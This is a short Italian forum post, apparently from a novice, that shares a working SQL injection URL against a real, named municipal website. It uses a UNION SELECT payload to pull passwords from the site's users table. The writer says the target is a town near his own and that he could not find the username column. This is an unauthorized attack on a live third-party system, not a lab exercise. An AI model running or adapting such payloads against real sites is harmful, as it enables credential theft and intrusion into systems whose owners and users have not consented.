Codice:
http://www.comune.gaeta.lt.it/comune/calendario.asp?flag=0&news=251+UNION+SELECT+1,password,3,4,5,6,7,8+FROM+users
Il sito è di un paese quasi confinante col mio.
Non sono riuscito a scovare la colonna degli username, questa è una delle mie prime SQL injection quindi siate pazienti unkmg: